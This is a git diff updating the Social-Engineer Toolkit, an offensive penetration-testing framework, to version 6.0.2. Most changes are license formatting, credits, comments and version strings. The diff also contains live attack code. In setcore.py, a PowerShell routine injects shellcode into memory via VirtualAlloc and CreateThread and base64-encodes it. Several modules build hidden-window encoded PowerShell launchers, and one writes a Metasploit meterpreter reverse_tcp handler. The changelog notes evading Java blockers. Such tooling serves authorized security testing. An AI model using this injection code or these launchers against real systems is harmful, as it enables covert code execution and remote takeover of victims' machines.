diff --git a/README.md b/README.md
index 927f3348e..819dd8334 100644
--- a/README.md
+++ b/README.md
@@ -5,8 +5,6 @@ Written by: David Kennedy (ReL1K)
Company: [TrustedSec](https://www.trustedsec.com)
-Development Team: Thomas Werth, Joey Furr (j0fer), JR DePre (pr1me)
-
DISCLAIMER: This is only for testing purposes and can only be used where strict consent has been given. Do not use this for illegal purposes period.
Please read the LICENSE under readme/LICENSE for the licensing of SET.
@@ -23,5 +21,3 @@ For bug reports or enhancements, please open an issue here https://github.com/tr
- Linux
- Windows (experimental)
-
-
diff --git a/readme/CHANGES b/readme/CHANGES
index 19ea1e22b..6c7bbd90f 100644
--- a/readme/CHANGES
+++ b/readme/CHANGES
@@ -1,3 +1,17 @@
+~~~~~~~~~~~~~~~~
+version 6.0.2
+~~~~~~~~~~~~~~~~
+
+* changed powershell injection technique to not exitonsession when creating the metasploit.rc file when specified in the powershell menu, this was already enabled when using psexec or other methods
+* shrunk the powershell injection code command, not as much length needed - useful for shorter payloads
+* slimmed down actual encoded powershell injection code, removed un-used code from the central powershell routine
+* fixed a few typos and alignment on licensing agreement within SET and minor silly modifications to license
+* fixed coloring when exiting and alignment for purpose of good disclaimer
+* added print_status to bleeding edge tracking
+* fixed unresponsive powershell injection when uses windows 8
+* changed java applet user agent string inside applet to evade java blockers
+* removed old ID and value parameters from the Java Applet database, no longer used based on changes through Java 7 update 42 - SET now uses manifest files
+
~~~~~~~~~~~~~~~~
version 6.0.1
~~~~~~~~~~~~~~~~
diff --git a/readme/CREDITS b/readme/CREDITS
index 0244aaf86..d28b9c7e1 100644
--- a/readme/CREDITS
+++ b/readme/CREDITS
@@ -62,6 +62,9 @@ Special thanks to the following people who have contributed to SET:
The Social-Engineer Development Team:
Dave Kennedy (ReL1K)
+
+Former Developers on SET:
+
JR DePre (pr1me)
Thomas Werth
Joey Furr (j0fer)
diff --git a/readme/LICENSE b/readme/LICENSE
index c6c33879c..1b2a3bf35 100644
--- a/readme/LICENSE
+++ b/readme/LICENSE
@@ -1,27 +1,17 @@
-Copyright 2013, The Social-Engineer Toolkit (SET) by TrustedSec, LLC
+Copyright 2014, The Social-Engineer Toolkit (SET) by TrustedSec, LLC
All rights reserved.
Redistribution and use in source and binary forms, with or without modification, are permitted provided that the following conditions are met:
* Redistributions of source code must retain the above copyright notice, this list of conditions and the following disclaimer.
- * Redistributions in binary form must reproduce the above copyright notice, this list of conditions and the following disclaimer
- in the documentation and/or other materials provided with the distribution.
- * Neither the name of Social-Engineer Toolkit nor the names of its contributors may be used to endorse or promote products derived from
- this software without specific prior written permission.
+ * Redistributions in binary form must reproduce the above copyright notice, this list of conditions and the following disclaimer in the documentation and/or other materials provided with the distribution.
+ * Neither the name of Social-Engineer Toolkit nor the names of its contributors may be used to endorse or promote products derived from this software without specific prior written permission.
-THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT
-LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT
-OWNER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT
-LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY
-THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF
-THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
+THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT OWNER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
The above licensing was taken from the BSD licensing and is applied to Social-Engineer Toolkit as well.
Note that the Social-Engineer Toolkit is provided as is, and is a royalty free open-source application.
-Feel free to modify, use, change, market, do whatever you want with it as long as you give the appropriate credit where credit
-is due (which means giving the authors the credit they deserve for writing it). Also note that by using this software, if you ever
-see the creator of SET in a bar, you should give him a hug and buy him a beer. Hug must last at least 5 seconds. Author
-holds the right to refuse the hug or the beer.
+Feel free to modify, use, change, market, do whatever you want with it as long as you give the appropriate credit where credit is due (which means giving the authors the credit they deserve for writing it). Also note that by using this software, if you ever see the creator of SET in a bar, you should give him a hug and buy him a beer. Hug must last at least 5 seconds. Author holds the right to refuse the hug (most likely will never happen) or the beer (also most likely will never happen).
diff --git a/setoolkit b/setoolkit
index b496e5d31..c7bba9d31 100755
--- a/setoolkit
+++ b/setoolkit
@@ -145,9 +145,7 @@ try:
print line.rstrip()
print bcolors.RED + """
-The Social-Engineer Toolkit is designed purely for good and not evil. If you are planning on using this tool for malicious purposes that are
-not authorized by the company you are performing assessments for, you are violating the terms of service and license of this toolset. By hitting
-yes (only one time), you agree to the terms of service and that you will only use this tool for lawful purposes only.""" + bcolors.GREEN
+The Social-Engineer Toolkit is designed purely for good and not evil. If you are planning on using this tool for malicious purposes that are not authorized by the company you are performing assessments for, you are violating the terms of service and license of this toolset. By hitting yes (only one time), you agree to the terms of service and that you will only use this tool for lawful purposes only.""" + bcolors.GREEN
choice = raw_input("\nDo you agree to the terms of service [y/n]: ")
if choice == "yes" or choice == "y":
filewrite = file("src/agreement4", "w")
@@ -155,7 +153,7 @@ yes (only one time), you agree to the terms of service and that you will only us
filewrite.close()
print bcolors.ENDC
else:
- print "[!] Exiting the Social-Engineer Toolkit, have a nice day." + bcolors.ENDC
+ print bcolors.ENDC + "[!] Exiting the Social-Engineer Toolkit, have a nice day." + bcolors.ENDC
sys.exit()
while 1:
diff --git a/src/core/setcore.py b/src/core/setcore.py
index ebd594887..c95183826 100644
--- a/src/core/setcore.py
+++ b/src/core/setcore.py
@@ -24,6 +24,7 @@ try:
from Crypto.Cipher import AES
except ImportError:
+
print "[!] The python-pycrypto python module not installed. You will lose the ability for encrypted communications."
pass
@@ -229,7 +230,7 @@ def print_error(message):
print bcolors.RED + bcolors.BOLD + "[!] " + bcolors.ENDC + bcolors.RED + str(message) + bcolors.ENDC
def get_version():
- define_version = '6.0'
+ define_version = '6.0.2'
return define_version
class create_menu:
@@ -277,11 +278,13 @@ def meta_path():
else: msf_path = msf_path + "/"
trigger = 0
if not os.path.isdir(msf_path):
+
# specific for kali linux
if os.path.isfile("/opt/metasploit/apps/pro/msf3/msfconsole"):
msf_path = "/opt/metasploit/apps/pro/msf3/"
trigger = 1
- # specific for backtrack5
+
+ # specific for backtrack5 and other backtrack versions
if os.path.isfile("/opt/framework3/msf3/msfconsole"):
msf_path = "/opt/framework3/msf3/"
trigger = 1
@@ -294,6 +297,7 @@ def meta_path():
if os.path.isfile("/usr/bin/msfconsole"):
msf_path = ""
trigger = 1
+
# specific for pwnpad and pwnplug (pwnie express)
if os.path.isfile("/opt/metasploit-framework/msfconsole"):
msf_path = "/opt/metasploit-framework"
@@ -307,6 +311,8 @@ def meta_path():
print_error("Please configure in the config/set_config.")
return_continue()
return False
+
+ # if we are using windows
if check_os() == "windows":
print_warning("Metasploit payloads are not currently supported. This is coming soon.")
msf_path = ""
@@ -425,6 +431,8 @@ def bleeding_edge():
print_status("Bleeding edge already active..Moving on..")
subprocess.Popen("apt-get update;apt-get upgrade -f -y --force-yes;apt-get dist-upgrade -f -y --force-yes;apt-get autoremove -f -y --force-yes", shell=True).wait()
return True
+
+ # else lets add them if they want
else:
print_status("Adding Kali bleeding edge to sources.list for updates.")
# we need to add repo to kali file
@@ -451,6 +459,7 @@ def update_set():
time.sleep(2)
bleeding_edge()
+ # if we aren't running Kali :(
else:
peinr_info("Kali-Linux not detected, manually updating..")
print_info("Updating the Social-Engineer Toolkit, be patient...")
@@ -792,7 +801,7 @@ def show_banner(define_version,graphic):
print bcolors.BLUE + """
[---] The Social-Engineer Toolkit ("""+bcolors.YELLOW+"""SET"""+bcolors.BLUE+""") [---]
[---] Created by:""" + bcolors.RED+""" David Kennedy """+bcolors.BLUE+"""("""+bcolors.YELLOW+"""ReL1K"""+bcolors.BLUE+""") [---]
-[---] Version: """+bcolors.RED+"""%s""" % (define_version) +bcolors.BLUE+""" [---]
+[---] Version: """+bcolors.RED+"""%s""" % (define_version) +bcolors.BLUE+""" [---]
[---] Codename: '""" + bcolors.YELLOW + """Rebellion""" + bcolors.BLUE + """' [---]
[---] Follow us on Twitter: """ + bcolors.PURPLE+ """@TrustedSec""" + bcolors.BLUE+""" [---]
[---] Follow me on Twitter: """ + bcolors.PURPLE+ """@HackingDave""" + bcolors.BLUE+""" [---]
@@ -1245,8 +1254,10 @@ def generate_powershell_alphanumeric_payload(payload,ipaddr,port, payload2):
# heres our shellcode prepped and ready to go
shellcode = newdata[:-1]
+
# powershell command here, needs to be unicoded then base64 in order to use encodedcommand - this incorporates a new process downgrade attack where if it detects 64 bit it'll use x86 powershell. This is useful so we don't have to guess if its x64 or x86 and what type of shellcode to use
- powershell_command = (r"""$1 = '$c = ''[DllImport("kernel32.dll")]public static extern IntPtr VirtualAlloc(IntPtr lpAddress, uint dwSize, uint flAllocationType, uint flProtect);[DllImport("kernel32.dll")]public static extern IntPtr CreateThread(IntPtr lpThreadAttributes, uint dwStackSize, IntPtr lpStartAddress, IntPtr lpParameter, uint dwCreationFlags, IntPtr lpThreadId);[DllImport("msvcrt.dll")]public static extern IntPtr memset(IntPtr dest, uint src, uint count);'';$w = Add-Type -memberDefinition $c -Name "Win32" -namespace Win32Functions -passthru;[Byte[]];[Byte[]]$sc = %s;$size = 0x1000;if ($sc.Length -gt 0x1000){$size = $sc.Length};$x=$w::VirtualAlloc(0,0x1000,$size,0x40);for ($i=0;$i -le ($sc.Length-1);$i++) {$w::memset([IntPtr]($x.ToInt32()+$i), $sc[$i], 1)};$w::CreateThread(0,0,$x,0,0,0);for (;;){Start-sleep 60};';$gq = [System.Convert]::ToBase64String([System.Text.Encoding]::Unicode.GetBytes($1));if([IntPtr]::Size -eq 8){$x86 = $env:SystemRoot + "\syswow64\WindowsPowerShell\v1.0\powershell";$cmd = "-nop -noni -enc ";iex "& $x86 $cmd $gq"}else{$cmd = "-nop -noni -enc";iex "& powershell $cmd $gq";}""" % (shellcode))
+ powershell_command = (r"""$1 = '$c = ''[DllImport("kernel32.dll")]public static extern IntPtr VirtualAlloc(IntPtr lpAddress, uint dwSize, uint flAllocationType, uint flProtect);[DllImport("kernel32.dll")]public static extern IntPtr CreateThread(IntPtr lpThreadAttributes, uint dwStackSize, IntPtr lpStartAddress, IntPtr lpParameter, uint dwCreationFlags, IntPtr lpThreadId);[DllImport("msvcrt.dll")]public static extern IntPtr memset(IntPtr dest, uint src, uint count);'';$w = Add-Type -memberDefinition $c -Name "Win32" -namespace Win32Functions -passthru;[Byte[]];[Byte[]]$sc = %s;$size = 0x1000;if ($sc.Length -gt 0x1000){$size = $sc.Length};$x=$w::VirtualAlloc(0,0x1000,$size,0x40);for ($i=0;$i -le ($sc.Length-1);$i++) {$w::memset([IntPtr]($x.ToInt32()+$i), $sc[$i], 1)};$w::CreateThread(0,0,$x,0,0,0);for (;;){Start-sleep 60};';$gq = [System.Convert]::ToBase64String([System.Text.Encoding]::Unicode.GetBytes($1));if([IntPtr]::Size -eq 8){$x86 = $env:SystemRoot + "\syswow64\WindowsPowerShell\v1.0\powershell";$cmd = "-nop -noni -enc ";iex "& $x86 $cmd $gq"}else{$cmd = "-nop -noni -enc";iex "& powershell $cmd $gq";}""" % (shellcode))
+
# unicode and base64 encode and return it
return base64.b64encode(powershell_command.encode('utf_16_le'))
@@ -1261,7 +1272,6 @@ def generate_shellcode(payload,ipaddr,port):
repls = {';' : '', ' ' : '', '+' : '', '"' : '', '\n' : '', 'unsigned char buf=' : '', 'unsignedcharbuf[]=' : ''}
data = reduce(lambda a, kv: a.replace(*kv), repls.iteritems(), data).rstrip()
# return data
- print data
return data
# this will take input for shellcode and do a replace for IP addresses
@@ -1602,18 +1612,18 @@ def bleeding_edge():
# first check if we are actually using Kali
kali = check_kali()
if kali == "Kali":
- print "[*] Checking to see if bleeding-edge repos are active."
+ print_status("Checking to see if bleeding-edge repos are active.")
# check if we have the repos enabled first
fileopen = file("/etc/apt/sources.list", "r")
kalidata = fileopen.read()
if "deb http://repo.kali.org/kali kali-bleeding-edge main" in kalidata:
- print "[*] Bleeding edge already active..Moving on.."
+ print_status("Bleeding edge already active..Moving on..")
return True
else:
- print "[!] Bleeding edge repos were not detected. This is recommended."
+ print_warning("Bleeding edge repos were not detected. This is recommended.")
enable = raw_input("Do you want to enable bleeding-edge repos for fast updates [yes/no]: ")
if enable == "y" or enable == "yes":
- print "[*] Adding Kali bleeding edge to sources.list for updates."
+ print_status("Adding Kali bleeding edge to sources.list for updates.")
# we need to add repo to kali file
# we will rewrite the entire apt in case not all repos are there
filewrite = file("/etc/apt/sources.list", "w")
diff --git a/src/fasttrack/mssql.py b/src/fasttrack/mssql.py
index 8816f0268..74373902d 100644
--- a/src/fasttrack/mssql.py
+++ b/src/fasttrack/mssql.py
@@ -183,7 +183,7 @@ def deploy_hex2binary(ipaddr,port,username,password):
x86 = file(setdir + "/x86.powershell", "r")
x86 = x86.read()
- x86 = "powershell -nop -win hidden -noni -enc " + x86
+ x86 = "powershell -nop -win hid -noni -enc " + x86
print_status("If you want the powershell commands and attack, they are exported to %s/reports/powershell/" % (setdir))
filewrite = file(setdir + "/reports/powershell/x86_powershell_injection.txt", "w")
filewrite.write(x86)
diff --git a/src/fasttrack/psexec.py b/src/fasttrack/psexec.py
index ce466320d..5416dff6b 100644
--- a/src/fasttrack/psexec.py
+++ b/src/fasttrack/psexec.py
@@ -64,7 +64,7 @@ try:
x86 = file(setdir + "/x86.powershell", "r")
x86 = x86.read()
- x86 = "powershell -nop -window hidden -noni -enc " + x86
+ x86 = "powershell -nop -win hid -noni -enc " + x86
print_status("If you want the powershell commands and attack, they are exported to %s/reports/powershell/" % (setdir))
filewrite = file(setdir + "/reports/powershell/x86_powershell_injection.txt", "w")
filewrite.write(x86)
diff --git a/src/powershell/powershell.py b/src/powershell/powershell.py
index 3b98acd27..333b307d7 100644
--- a/src/powershell/powershell.py
+++ b/src/powershell/powershell.py
@@ -40,7 +40,7 @@ if powershell_menu_choice != "99":
# here we format everything for us
x86 = file(setdir + "/x86.powershell", "r")
x86 = x86.read()
- x86 = "powershell -nop -windows hidden -noni -enc " + x86
+ x86 = "powershell -nop -win hid -noni -enc " + x86
print_status("If you want the powershell commands and attack, they are exported to %s/reports/powershell/" % (setdir))
filewrite = file(setdir + "/reports/powershell/x86_powershell_injection.txt", "w")
filewrite.write(x86)
@@ -53,7 +53,7 @@ if powershell_menu_choice != "99":
# if we want to start the listener
if choice == 'YES':
filewrite = file(setdir + "/reports/powershell/powershell.rc", "w")
- filewrite.write("use multi/handler\nset payload windows/meterpreter/reverse_tcp\nset lport %s\nset LHOST 0.0.0.0\nexploit -j" % (port))
+ filewrite.write("use multi/handler\nset payload windows/meterpreter/reverse_tcp\nset LPORT %s\nset LHOST 0.0.0.0\nset ExitOnSession false\nexploit -j" % (port))
filewrite.close()
msf_path = meta_path()
subprocess.Popen("ruby %s/msfconsole -L -r %s/reports/powershell/powershell.rc" % (msf_path, setdir), shell=True).wait()
diff --git a/src/webattack/web_clone/applet.database b/src/webattack/web_clone/applet.database
index 9bae17159..6ef10555e 100644
--- a/src/webattack/web_clone/applet.database
+++ b/src/webattack/web_clone/applet.database
@@ -1 +1 @@
-
+
diff --git a/src/webattack/web_clone/applet.database.old b/src/webattack/web_clone/applet.database.old
index aabc2b852..9bae17159 100644
--- a/src/webattack/web_clone/applet.database.old
+++ b/src/webattack/web_clone/applet.database.old
@@ -1 +1 @@
-
+